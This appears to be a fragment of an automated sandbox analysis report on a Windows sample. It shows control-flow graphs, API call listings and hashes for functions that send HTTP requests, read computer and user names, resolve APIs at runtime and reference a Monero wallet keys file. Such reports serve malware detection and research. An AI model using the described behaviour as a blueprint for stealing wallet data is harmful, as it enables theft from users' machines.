                  control_flow_graph 801 d34880-d34942 call d4a7a0 call d347b0 call d4a740 * 5 InternetOpenA StrCmpCA 816 d34944 801->816 817 d3494b-d3494f 801->817 816->817 818 d34955-d34acd call d48b60 call d4a920 call d4a8a0 call d4a800 * 2 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a920 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a920 call d4a8a0 call d4a800 * 2 InternetConnectA 817->818 819 d34ecb-d34ef3 InternetCloseHandle call d4aad0 call d39ac0 817->819 818->819 905 d34ad3-d34ad7 818->905 829 d34f32-d34fa2 call d48990 * 2 call d4a7a0 call d4a800 * 8 819->829 830 d34ef5-d34f2d call d4a820 call d4a9b0 call d4a8a0 call d4a800 819->830 830->829 906 d34ae5 905->906 907 d34ad9-d34ae3 905->907 908 d34aef-d34b22 HttpOpenRequestA 906->908 907->908 909 d34b28-d34e28 call d4a9b0 call d4a8a0 call d4a800 call d4a920 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a920 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a920 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a920 call d4a8a0 call d4a800 call d4a740 call d4a920 * 2 call d4a8a0 call d4a800 * 2 call d4aad0 lstrlen call d4aad0 * 2 lstrlen call d4aad0 HttpSendRequestA 908->909 910 d34ebe-d34ec5 InternetCloseHandle 908->910 1021 d34e32-d34e5c InternetReadFile 909->1021 910->819 1022 d34e67-d34eb9 InternetCloseHandle call d4a800 1021->1022 1023 d34e5e-d34e65 1021->1023 1022->910 1023->1022 1024 d34e69-d34ea7 call d4a9b0 call d4a8a0 call d4a800 1023->1024 1024->1021
                  APIs
                    • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                    • Part of subcall function 00D347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D34839
                    • Part of subcall function 00D347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D34849
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00D34915
                  • StrCmpCA.SHLWAPI(?,00AFE9F8), ref: 00D3493A
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D34ABA
                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00D50DDB,00000000,?,?,00000000,?,",00000000,?,00AFE958), ref: 00D34DE8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00D34E04
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00D34E18
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00D34E49
                  • InternetCloseHandle.WININET(00000000), ref: 00D34EAD
                  • InternetCloseHandle.WININET(00000000), ref: 00D34EC5
                  • HttpOpenRequestA.WININET(00000000,00AFEA08,?,00AFE218,00000000,00000000,00400100,00000000), ref: 00D34B15
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                  • InternetCloseHandle.WININET(00000000), ref: 00D34ECF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 460715078-2180234286
                  • Opcode ID: 871d6f240b32913cf761fc1762bb3f85703502892a9cbde9937e6fbb5b6a3dc1
                  • Instruction ID: 015246e3a188a278cd97d149910b6f34e204f363d59906de15a625a0649368e7
                  • Opcode Fuzzy Hash: 871d6f240b32913cf761fc1762bb3f85703502892a9cbde9937e6fbb5b6a3dc1
                  • Instruction Fuzzy Hash: FA12B572950118ABEB15EBA4DC92FEEB378EF54304F514199B50662091EF702F89CF72
                  Function 00D478E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47910
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D47917
                  • GetComputerNameA.KERNEL32(?,00000104), ref: 00D4792F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateComputerNameProcess
                  • String ID:
                  • API String ID: 1664310425-0
                  • Opcode ID: d84ec6d048155172c4035218bf227f27df0cf543a0a8beb7903d9e934abcad4c
                  • Instruction ID: d9be1405fe409dbb5c2c492f97846bd3080d95864ed19e184bc5d73c30bd4a67
                  • Opcode Fuzzy Hash: d84ec6d048155172c4035218bf227f27df0cf543a0a8beb7903d9e934abcad4c
                  • Instruction Fuzzy Hash: 4D01A4B1A04208EFCB04DF98DD45BAEBBB8FB44B21F10425AFA45E3380D37459448BB2
                  Function 00D47850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00D311B7), ref: 00D47880
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D47887
                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00D4789F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateNameProcessUser
                  • String ID:
                  • API String ID: 1296208442-0
                  • Opcode ID: 928b9db15edd1ff59b931d263b7a99eea234e1c3947676dcc66eb2d72549f929
                  • Instruction ID: 158ed1e6cd03b51b977592e2d57af3cc983e5301bb3728a85a524026342f87b8
                  • Opcode Fuzzy Hash: 928b9db15edd1ff59b931d263b7a99eea234e1c3947676dcc66eb2d72549f929
                  • Instruction Fuzzy Hash: 01F04FB1944208AFC714DF98DD4ABAEBBB8EB44711F10025AFA05A2680C77455448BA2
                  Function 00D31160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitInfoProcessSystem
                  • String ID:
                  • API String ID: 752954902-0
                  • Opcode ID: 4204713dcdecef06eb317b64f6078efefbae511ce6bf2490bfe6d744b91e6bc2
                  • Instruction ID: 75040abc17f4b85b396fec5a7907695b348c4a04d8747783bb06b48c9529ceab
                  • Opcode Fuzzy Hash: 4204713dcdecef06eb317b64f6078efefbae511ce6bf2490bfe6d744b91e6bc2
                  • Instruction Fuzzy Hash: EFD05E7490030CDBCB04DFE0D8496DDBBB8FB4C312F000554DD0962340EA3054C2CAA6
                  Function 00D49C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 633 d49c10-d49c1a 634 d4a036-d4a0ca LoadLibraryA * 8 633->634 635 d49c20-d4a031 GetProcAddress * 43 633->635 636 d4a146-d4a14d 634->636 637 d4a0cc-d4a141 GetProcAddress * 5 634->637 635->634 638 d4a216-d4a21d 636->638 639 d4a153-d4a211 GetProcAddress * 8 636->639 637->636 640 d4a21f-d4a293 GetProcAddress * 5 638->640 641 d4a298-d4a29f 638->641 639->638 640->641 642 d4a2a5-d4a332 GetProcAddress * 6 641->642 643 d4a337-d4a33e 641->643 642->643 644 d4a344-d4a41a GetProcAddress * 9 643->644 645 d4a41f-d4a426 643->645 644->645 646 d4a4a2-d4a4a9 645->646 647 d4a428-d4a49d GetProcAddress * 5 645->647 648 d4a4dc-d4a4e3 646->648 649 d4a4ab-d4a4d7 GetProcAddress * 2 646->649 647->646 650 d4a515-d4a51c 648->650 651 d4a4e5-d4a510 GetProcAddress * 2 648->651 649->648 652 d4a612-d4a619 650->652 653 d4a522-d4a60d GetProcAddress * 10 650->653 651->650 654 d4a67d-d4a684 652->654 655 d4a61b-d4a678 GetProcAddress * 4 652->655 653->652 656 d4a686-d4a699 GetProcAddress 654->656 657 d4a69e-d4a6a5 654->657 655->654 656->657 658 d4a6a7-d4a703 GetProcAddress * 4 657->658 659 d4a708-d4a709 657->659 658->659
                  APIs
                  • GetProcAddress.KERNEL32(74DD0000,00AE5B30), ref: 00D49C2D
                  • GetProcAddress.KERNEL32(74DD0000,00AE5BF0), ref: 00D49C45
                  • GetProcAddress.KERNEL32(74DD0000,00AF9688), ref: 00D49C5E
                  • GetProcAddress.KERNEL32(74DD0000,00AF96A0), ref: 00D49C76
                  • GetProcAddress.KERNEL32(74DD0000,00AF9628), ref: 00D49C8E
                  • GetProcAddress.KERNEL32(74DD0000,00AF9640), ref: 00D49CA7
                  • GetProcAddress.KERNEL32(74DD0000,00AEBA18), ref: 00D49CBF
                  • GetProcAddress.KERNEL32(74DD0000,00AFD578), ref: 00D49CD7
                  • GetProcAddress.KERNEL32(74DD0000,00AFD500), ref: 00D49CF0
                  • GetProcAddress.KERNEL32(74DD0000,00AFD590), ref: 00D49D08
                  • GetProcAddress.KERNEL32(74DD0000,00AFD4A0), ref: 00D49D20
                  • GetProcAddress.KERNEL32(74DD0000,00AE5DB0), ref: 00D49D39
                  • GetProcAddress.KERNEL32(74DD0000,00AE5C30), ref: 00D49D51
                  • GetProcAddress.KERNEL32(74DD0000,00AE5AD0), ref: 00D49D69
                  • GetProcAddress.KERNEL32(74DD0000,00AE5C50), ref: 00D49D82
                  • GetProcAddress.KERNEL32(74DD0000,00AFD4D0), ref: 00D49D9A
                  • GetProcAddress.KERNEL32(74DD0000,00AFD470), ref: 00D49DB2
                  • GetProcAddress.KERNEL32(74DD0000,00AEB9A0), ref: 00D49DCB
                  • GetProcAddress.KERNEL32(74DD0000,00AE5CD0), ref: 00D49DE3
                  • GetProcAddress.KERNEL32(74DD0000,00AFD4B8), ref: 00D49DFB
                  • GetProcAddress.KERNEL32(74DD0000,00AFD488), ref: 00D49E14
                  • GetProcAddress.KERNEL32(74DD0000,00AFD4E8), ref: 00D49E2C
                  • GetProcAddress.KERNEL32(74DD0000,00AFD518), ref: 00D49E44
                  • GetProcAddress.KERNEL32(74DD0000,00AE5DD0), ref: 00D49E5D
                  • GetProcAddress.KERNEL32(74DD0000,00AFD530), ref: 00D49E75
                  • GetProcAddress.KERNEL32(74DD0000,00AFD5A8), ref: 00D49E8D
                  • GetProcAddress.KERNEL32(74DD0000,00AFD548), ref: 00D49EA6
                  • GetProcAddress.KERNEL32(74DD0000,00AFD560), ref: 00D49EBE
                  • GetProcAddress.KERNEL32(74DD0000,00AFD3F8), ref: 00D49ED6
                  • GetProcAddress.KERNEL32(74DD0000,00AFD410), ref: 00D49EEF
                  • GetProcAddress.KERNEL32(74DD0000,00AFD428), ref: 00D49F07
                  • GetProcAddress.KERNEL32(74DD0000,00AFD440), ref: 00D49F1F
                  • GetProcAddress.KERNEL32(74DD0000,00AFD458), ref: 00D49F38
                  • GetProcAddress.KERNEL32(74DD0000,00AFA450), ref: 00D49F50
                  • GetProcAddress.KERNEL32(74DD0000,00AFD0E0), ref: 00D49F68
                  • GetProcAddress.KERNEL32(74DD0000,00AFCF60), ref: 00D49F81
                  • GetProcAddress.KERNEL32(74DD0000,00AE5C70), ref: 00D49F99
                  • GetProcAddress.KERNEL32(74DD0000,00AFD038), ref: 00D49FB1
                  • GetProcAddress.KERNEL32(74DD0000,00AE57F0), ref: 00D49FCA
                  • GetProcAddress.KERNEL32(74DD0000,00AFCF48), ref: 00D49FE2
                  • GetProcAddress.KERNEL32(74DD0000,00AFD050), ref: 00D49FFA
                  • GetProcAddress.KERNEL32(74DD0000,00AE5970), ref: 00D4A013
                  • GetProcAddress.KERNEL32(74DD0000,00AE56D0), ref: 00D4A02B
                  • LoadLibraryA.KERNEL32(00AFCE40,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A03D
                  • LoadLibraryA.KERNEL32(00AFCF30,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A04E
                  • LoadLibraryA.KERNEL32(00AFCE70,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A060
                  • LoadLibraryA.KERNEL32(00AFCFA8,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A072
                  • LoadLibraryA.KERNEL32(00AFCFD8,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A083
                  • LoadLibraryA.KERNEL32(00AFCEE8,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A095
                  • LoadLibraryA.KERNEL32(00AFCE88,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A0A7
                  • LoadLibraryA.KERNEL32(00AFCE28,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A0B8
                  • GetProcAddress.KERNEL32(75290000,00AE5A70), ref: 00D4A0DA
                  • GetProcAddress.KERNEL32(75290000,00AFD068), ref: 00D4A0F2
                  • GetProcAddress.KERNEL32(75290000,00AF8F88), ref: 00D4A10A
                  • GetProcAddress.KERNEL32(75290000,00AFCEA0), ref: 00D4A123
                  • GetProcAddress.KERNEL32(75290000,00AE59D0), ref: 00D4A13B
                  • GetProcAddress.KERNEL32(6FD40000,00AEB978), ref: 00D4A160
                  • GetProcAddress.KERNEL32(6FD40000,00AE57D0), ref: 00D4A179
                  • GetProcAddress.KERNEL32(6FD40000,00AEB6D0), ref: 00D4A191
                  • GetProcAddress.KERNEL32(6FD40000,00AFD080), ref: 00D4A1A9
                  • GetProcAddress.KERNEL32(6FD40000,00AFCEB8), ref: 00D4A1C2
                  • GetProcAddress.KERNEL32(6FD40000,00AE5850), ref: 00D4A1DA
                  • GetProcAddress.KERNEL32(6FD40000,00AE5810), ref: 00D4A1F2
                  • GetProcAddress.KERNEL32(6FD40000,00AFCDF8), ref: 00D4A20B
                  • GetProcAddress.KERNEL32(752C0000,00AE59B0), ref: 00D4A22C
                  • GetProcAddress.KERNEL32(752C0000,00AE5A90), ref: 00D4A244
                  • GetProcAddress.KERNEL32(752C0000,00AFCE58), ref: 00D4A25D
                  • GetProcAddress.KERNEL32(752C0000,00AFD008), ref: 00D4A275
                  • GetProcAddress.KERNEL32(752C0000,00AE56B0), ref: 00D4A28D
                  • GetProcAddress.KERNEL32(74EC0000,00AEB6F8), ref: 00D4A2B3
                  • GetProcAddress.KERNEL32(74EC0000,00AEB720), ref: 00D4A2CB
                  • GetProcAddress.KERNEL32(74EC0000,00AFD098), ref: 00D4A2E3
                  • GetProcAddress.KERNEL32(74EC0000,00AE5950), ref: 00D4A2FC
                  • GetProcAddress.KERNEL32(74EC0000,00AE57B0), ref: 00D4A314
                  • GetProcAddress.KERNEL32(74EC0000,00AEBAB8), ref: 00D4A32C
                  • GetProcAddress.KERNEL32(75BD0000,00AFCF78), ref: 00D4A352
                  • GetProcAddress.KERNEL32(75BD0000,00AE5770), ref: 00D4A36A
                  • GetProcAddress.KERNEL32(75BD0000,00AF9018), ref: 00D4A382
                  • GetProcAddress.KERNEL32(75BD0000,00AFCF90), ref: 00D4A39B
                  • GetProcAddress.KERNEL32(75BD0000,00AFCED0), ref: 00D4A3B3
                  • GetProcAddress.KERNEL32(75BD0000,00AE5890), ref: 00D4A3CB
                  • GetProcAddress.KERNEL32(75BD0000,00AE56F0), ref: 00D4A3E4
                  • GetProcAddress.KERNEL32(75BD0000,00AFCFC0), ref: 00D4A3FC
                  • GetProcAddress.KERNEL32(75BD0000,00AFD0B0), ref: 00D4A414
                  • GetProcAddress.KERNEL32(75A70000,00AE5830), ref: 00D4A436
                  • GetProcAddress.KERNEL32(75A70000,00AFCFF0), ref: 00D4A44E
                  • GetProcAddress.KERNEL32(75A70000,00AFD0C8), ref: 00D4A466
                  • GetProcAddress.KERNEL32(75A70000,00AFD020), ref: 00D4A47F
                  • GetProcAddress.KERNEL32(75A70000,00AFCF00), ref: 00D4A497
                  • GetProcAddress.KERNEL32(75450000,00AE5870), ref: 00D4A4B8
                  • GetProcAddress.KERNEL32(75450000,00AE5710), ref: 00D4A4D1
                  • GetProcAddress.KERNEL32(75DA0000,00AE5730), ref: 00D4A4F2
                  • GetProcAddress.KERNEL32(75DA0000,00AFCE10), ref: 00D4A50A
                  • GetProcAddress.KERNEL32(6F070000,00AE5930), ref: 00D4A530
                  • GetProcAddress.KERNEL32(6F070000,00AE5990), ref: 00D4A548
                  • GetProcAddress.KERNEL32(6F070000,00AE58B0), ref: 00D4A560
                  • GetProcAddress.KERNEL32(6F070000,00AFCF18), ref: 00D4A579
                  • GetProcAddress.KERNEL32(6F070000,00AE5750), ref: 00D4A591
                  • GetProcAddress.KERNEL32(6F070000,00AE58D0), ref: 00D4A5A9
                  • GetProcAddress.KERNEL32(6F070000,00AE5790), ref: 00D4A5C2
                  • GetProcAddress.KERNEL32(6F070000,00AE59F0), ref: 00D4A5DA
                  • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00D4A5F1
                  • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00D4A607
                  • GetProcAddress.KERNEL32(75AF0000,00AFD158), ref: 00D4A629
                  • GetProcAddress.KERNEL32(75AF0000,00AF8FB8), ref: 00D4A641
                  • GetProcAddress.KERNEL32(75AF0000,00AFD290), ref: 00D4A659
                  • GetProcAddress.KERNEL32(75AF0000,00AFD2C0), ref: 00D4A672
                  • GetProcAddress.KERNEL32(75D90000,00AE58F0), ref: 00D4A693
                  • GetProcAddress.KERNEL32(6E360000,00AFD2D8), ref: 00D4A6B4
                  • GetProcAddress.KERNEL32(6E360000,00AE5910), ref: 00D4A6CD
                  • GetProcAddress.KERNEL32(6E360000,00AFD2A8), ref: 00D4A6E5
                  • GetProcAddress.KERNEL32(6E360000,00AFD2F0), ref: 00D4A6FD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: HttpQueryInfoA$InternetSetOptionA
                  • API String ID: 2238633743-1775429166
                  • Opcode ID: a652647a8bedb82f41bac645b2c761131ee75924534df3b1c821a18e66c5980e
                  • Instruction ID: 03d1c4cbc61866fd1660ee10c33f4ebe8bab3b610cd9e7bcac72d46d29f393c5
                  • Opcode Fuzzy Hash: a652647a8bedb82f41bac645b2c761131ee75924534df3b1c821a18e66c5980e
                  • Instruction Fuzzy Hash: 52621AB5504208AFD348DFA8ED8995E37F9F7CC201716851AA61DC3264D63A98C2FF63
                  Function 00D36280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1033 d36280-d3630b call d4a7a0 call d347b0 call d4a740 InternetOpenA StrCmpCA 1040 d36314-d36318 1033->1040 1041 d3630d 1033->1041 1042 d36509-d36525 call d4a7a0 call d4a800 * 2 1040->1042 1043 d3631e-d36342 InternetConnectA 1040->1043 1041->1040 1062 d36528-d3652d 1042->1062 1045 d36348-d3634c 1043->1045 1046 d364ff-d36503 InternetCloseHandle 1043->1046 1048 d3635a 1045->1048 1049 d3634e-d36358 1045->1049 1046->1042 1051 d36364-d36392 HttpOpenRequestA 1048->1051 1049->1051 1053 d364f5-d364f9 InternetCloseHandle 1051->1053 1054 d36398-d3639c 1051->1054 1053->1046 1055 d363c5-d36405 HttpSendRequestA HttpQueryInfoA 1054->1055 1056 d3639e-d363bf InternetSetOptionA 1054->1056 1058 d36407-d36427 call d4a740 call d4a800 * 2 1055->1058 1059 d3642c-d3644b call d48940 1055->1059 1056->1055 1058->1062 1067 d364c9-d364e9 call d4a740 call d4a800 * 2 1059->1067 1068 d3644d-d36454 1059->1068 1067->1062 1071 d364c7-d364ef InternetCloseHandle 1068->1071 1072 d36456-d36480 InternetReadFile 1068->1072 1071->1053 1076 d36482-d36489 1072->1076 1077 d3648b 1072->1077 1076->1077 1080 d3648d-d364c5 call d4a9b0 call d4a8a0 call d4a800 1076->1080 1077->1071 1080->1072
                  APIs
